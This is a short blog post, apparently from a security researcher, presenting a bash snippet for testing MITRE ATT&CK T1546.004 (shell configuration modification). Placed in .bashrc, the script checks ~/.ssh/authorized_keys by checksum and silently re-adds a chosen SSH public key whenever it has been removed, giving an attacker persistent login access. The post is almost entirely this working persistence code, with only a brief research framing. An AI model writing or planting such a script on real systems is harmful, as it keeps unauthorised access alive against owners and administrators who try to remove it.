As I was researching how "Unix Shell Configuration Modification" could be tested in a .bashrc file, I created the following bash commands that could be used. It loops through the .ssh/authorized_keys files reading each line. A sha256 checksum is gathered for the line of the ssh_key that you wish to insert. If the ssh_key does not exist it will insert it, if the ssh_key does exist it does nothing.
exists="False"
while read l; do
checksum=`echo "$l" | sha256sum | awk '{print $1}'`
# For troubleshooting uncomment the following line to verify the checksum of the line in ~/.ssh/authorized_keys
# echo $checksum
# Substitute the checksum for the ssh-key that you want to be reintroduced to the authorized_keys file...
if [ "$checksum" == "333459f693d01b41c0083bf8dc25ad51e08adf4a9474a3fb34198e3967d53bd4" ]; then
exists="True"
fi
done < ~/.ssh/authorized_keys
if [ "$exists" == "False" ]; then
# Verify the ssh-key that you are using is placed below...
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCxGaIRqqBKzYJE+0atqKP9u/NCEElmevLyzdkPUYWHxZo16j8OykIfytbCDCagGobdCq4BOEQ48AoyecvFSG+G4NQib4iDDQMzp4+2b5Rs9LpAZgFAaU5BN2MIh7JNk6zWZ23Z5lOse4AembbyFsR0bQvfFSd1XzagUrmkH/Tg4EPgneieYyTp4vk2shvLWVxabZljsKd4hvV3Ei2xcCPU6nAqVoYNOAdUAI9HNkCf3ZDJU/zcm4MjGjCEoww0Krvuy9NuT2JIKdnk2OZHtKU4glIRLOQl3cI0AZaq6IF5VYsniVy+Ag6hVsLfEb7ByJIVlYkvgsW0POjfqLYezGd1Cwz5BKiTJUsCTt/GRhOgpAEkRVhY6TuMr/wgnyUMWxvSsiiLVahU4zvwyJsf8FD5vEhjc4yq+uwB7GX38fVam19LLRcF3OzHm3+mOxZRXjctnq5S6AQMRdTzHzC1tsj0= invalid@key" >> ~/.ssh/authorized_keys
fi Reference: https://attack.mitre.org/techniques/T1546/004/
No comments:
Post a Comment